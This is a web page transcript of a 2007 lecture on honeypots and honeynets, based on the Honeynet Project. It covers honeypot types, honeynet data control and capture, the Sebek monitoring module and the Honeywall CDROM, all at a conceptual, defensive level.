Honeypots and honeynets
This presentation is the property of its rightful owner.
Sponsored Links
1 / 19

Honeypots and Honeynets PowerPoint PPT Presentation


  • 72 Views
  • Uploaded on
  • Presentation posted in: General

Honeypots and Honeynets. Source: The HoneyNet Project http://www.honeynet.org/ Mehedi Masud September 19, 2007 Lecture #12. Why HoneyPots. A great deal of the security profession and the IT world depend on honeypots. Honeypots Build anti-virus signatures.

Download Presentation

Honeypots and Honeynets

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Honeypots and honeynets

Honeypots and Honeynets

Source: The HoneyNet Project http://www.honeynet.org/

Mehedi Masud

September 19, 2007

Lecture #12


Why honeypots

Why HoneyPots

A great deal of the security profession and the IT world depend on honeypots. Honeypots

  • Build anti-virus signatures.

  • Build SPAM signatures and filters.

  • ISP’s identify compromised systems.

  • Assist law-enforcement to track criminals.

  • Hunt and shutdown botnets.

  • Malware collection and analysis.


What are honeypots

What are Honeypots

  • Honeypots are real or emulated vulnerable systems ready to be attacked.

  • Primary value of honeypots is to collect information.

  • This information is used to better identify, understand and protect against threats.

  • Honeypots add little direct value to protecting your network.


Types of honeypot

Types of HoneyPot

  • Server: Put the honeypot on the Internet and let the bad guys come to you.

  • Client: Honeypot initiates and interacts with servers

  • Other: Proxies


Types of honeypot1

Types of HoneyPot

  • Low-interaction

    • Emulates services, applications, and OS’s.

    • Low risk and easy to deploy/maintain, but capture limited information.

  • High-interaction

    • Real services, applications, and OS’s

    • Capture extensive information, but high risk and time intensive to maintain.


Examples of honeypots

Examples Of Honeypots

  • BackOfficer Friendly

  • KFSensor

  • Honeyd

  • Honeynets

Low Interaction

High Interaction


Honeynets

Honeynets

  • High-interaction honeypot designed to capture in-depth information.

  • Information has different value to different organizations.

  • Its an architecture you populate with live systems, not a product or software.

  • Any traffic entering or leaving is suspect.


How it works

How It Works

  • A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.

    • Data Control

    • Data Capture

    • Data Analysis


Honeynet architecture

Honeynet Architecture


Data control

Data Control

  • Mitigate risk of honeynet being used to harm non-honeynet systems.

  • Count outbound connections.

  • IPS (Snort-Inline)

  • Bandwidth Throttling


No data control

No Data Control


Data control1

Data Control


Data capture

Data Capture

  • Capture all activity at a variety of levels.

  • Network activity.

  • Application activity.

  • System activity.


Sebek

Sebek

  • Hidden kernel module that captures all host activity

  • Dumps activity to the network.

  • Attacker cannot sniff any traffic based on magic number and dst port.


Sebek architecture

Sebek Architecture


Honeywall cdrom

Honeywall CDROM

  • Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.

  • May, 2003 - Released Eeyore

  • May, 2005 - Released Roo


Roo honeywall cdrom

RooHoneywall CDROM

  • Based on Fedora Core 3

  • Vastly improved hardware and international support.

  • Automated, headless installation

  • New Walleye interface for web based administration and data analysis.

  • Automated system updating.


Installation

Installation

  • Just insert CDROM and boot, it installs to local hard drive.

  • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.

  • Following installation, you get a command prompt and system is ready to configure.


Further information

Further Information

  • http://www.honeynet.org/

  • http://www.honeynet.org/book


  • Login